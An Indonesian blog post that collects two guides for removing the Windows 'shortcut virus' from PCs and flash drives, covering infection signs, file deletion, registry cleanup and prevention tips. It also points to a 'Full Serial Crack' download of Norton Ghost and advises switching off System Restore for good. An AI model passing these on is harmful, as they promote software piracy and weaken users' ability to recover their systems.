HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255


6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash disk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi ‘Search’. Sebelum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options.


Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file duplikat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai ciri-ciri:


-. Icon ‘Microsoft Visual Basic Project’.

-. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi).

-. Ekstesi file ‘.EXE’ atau ‘.SCR’.

-. Type file ‘Application’ atau ‘Screen Saver’.


Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri:


>. Icon Folder atau icon

>. Ekstensi .LNK

>. Type File ‘Shortcut’

>. Ukuran file 1 KB


Hapus juga file yang .DLL (contoh: ert.dll) dan file Autorun.inf di flash disk atau folder yang di-share. Sementara untuk menghindari virus tersebut aktif kembali, hapus file induk yang mempunyai ekstensi EXE atau SCR terlebih dahulu baru kemudian hapus file Shortcut (.LNK).


7. Tampilkan kembali folder yang telah disembunyikan oleh virus. Untuk mempercepat proses tersebut, silahkan download tools UnHide File and Folder di http://www.flashshare.com/bfu/download.html.


Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang ada di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attributes].


8. Install security patch ‘Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046′. Silakan download security patch tersebut di http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx


Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, sebaiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini dengan baik.


Original source: vaksin[dot]com & detikinet[dot]com


CARA 2 MENGHAPUS VIRUS SHORTCUT:


Ciri-ciri virus shortcut :


Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents


Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali.


Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder


Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and….lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut.


Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.


Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini.


Langkah-langkah menghapus virus shortcut :


1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost (baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack)


2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)


Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan download : HijackThis 2.0.2 ).


3. Hapus file virus database.mdb di My Documents..


4. Hapus file duplikat virus..


Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada “More advanced options”, pastikan option “Search system folders” dan “Search hidden files and folders” keduanya telah dicentang.


Search file dengan nama autorun.inf ukurannya 8 KB


Search file dengan nama Thumb.db ukurannya 8 KB


Search file dengan ekstensi .lnk.lnk ukurannya 1 KB


Hapus semua file yang ditemukan..


Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar).


5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..


Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus)


regedit_run


Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut:


1. Setelah proses instalasi windows, segera matikan system restore.


2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk).


3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.


4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah.


5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan.


Nah, itu mungkin sedikit tips cara menghapus virus shortcut dan smoga komputer kamu setelah hapus virus shortcut jadi bebas deh dari virus shortcut.


Original source: maswafa[dot]blogger[dot]com

Related Posts Plugin for WordPress, Blogger...
ads
free counters

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More